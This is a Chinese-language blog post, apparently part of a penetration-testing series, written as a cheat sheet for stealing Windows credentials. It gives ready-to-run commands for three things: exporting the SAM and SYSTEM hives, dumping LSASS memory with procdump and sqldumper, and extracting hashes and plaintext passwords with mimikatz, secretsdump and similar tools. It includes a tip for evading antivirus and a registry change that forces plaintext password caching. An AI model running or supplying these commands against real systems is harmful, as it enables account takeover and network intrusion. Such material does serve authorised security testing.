一、mimikatz工具抓取密码:
1.抓取本地SAM文件中的密码
①从注册表中导出
reg save HKLM\SYSTEM sys.hiv #获取SYSTEM注册表信息,导出为sys.hiv文件reg save HKLM\SAM sam.hiv #获取SAM注册表信息,导出为sam.hiv文件
②还可以使用nihsang中的Invoke-NinjaCopy.ps1脚本导出
①导出SAM文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination sam
②导出SYSTEM文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination sys
用mimikatz解密导出的两个文件
privilege::debug #提升权限lsadump::sam /sam:sam.hiv /system:sys.hiv #mimikatz运行解密命令
用impacket中的secretsdump解密:
secretsdump.exe -sam SAM -system SYSTEM LOCAL
②在线方式获取sam文件hash
privilege::debug #提升权限token::elevatelsadump::sam #导出sam文件中的hash
2.抓取内存的密码-lsass进程获取hash
1、直接上传mimikatz在线获取:
privilege::debug #提升权限sekurlsa::logonpasswords full #抓lsass进程中的密码
2、prodump+mimikatz
①把lsass进程文件拖回本地破解(因为直接上传会报杀)注意工具与目标系统位数要一致
procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp #在目标机子执行导出为lsass.dmp,然后拖回本地
③挂载lsass.dmp文件
sekurlsa::minidump lsass.dmp#挂载lsass.dmp
④抓取lsass.dmp文件中的密码
log #会在目录下生成.log文件,方便查看sekurlsa::logonpasswords full #mimikatz执行,在拖回的.dmp文件抓取密码
3、sqldumper+mimikatz
①首先查看lsass进程的PID
tasklist /svc |findstr lsass.exe
②利用sqldumper转储
Sqldumper.exe <PID> 0 0x01100 #后面的数字是固定的,然后就会生成Sqlxxx.mdmp文件
③利用mimikatz抓取hash
sekurlsa::minidump SQLDmpr0001.mdmpsekurlsa::logonPasswords full
需要说明一下的是,当系统为win10或者win2012R2以上时,默认内存缓存中禁止保存明文密码,此时可以通过修改组测表的方式抓取明文,但是需要用户重新登陆后才能抓取成功。
命令如下:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
当重启服务器的时候,我们重新加载mimikatz,就可以抓取密码。
二、使用其它工具抓密码
①wce
upload传上去,目标cmdshell下输入
wce.exe -w #命令抓取明文密码
wce.exe -l #可以抓到ntlm的哈希值
②GetPass
根据目标机器系统位数上传
getpassword_x64.exe
③PwDump7
PwDump7.exe
④QuarksPwDump
QuarksPwDump.exe --dump-hash-local
还可以使用msf和cs抓密码,具体方法也比较简单,就不再阐述了
文章仅作为参考,如果有错误的地方请多包涵...
收录于合集 #内网/域渗透
28个
下一篇SSH隧道端口转发详解
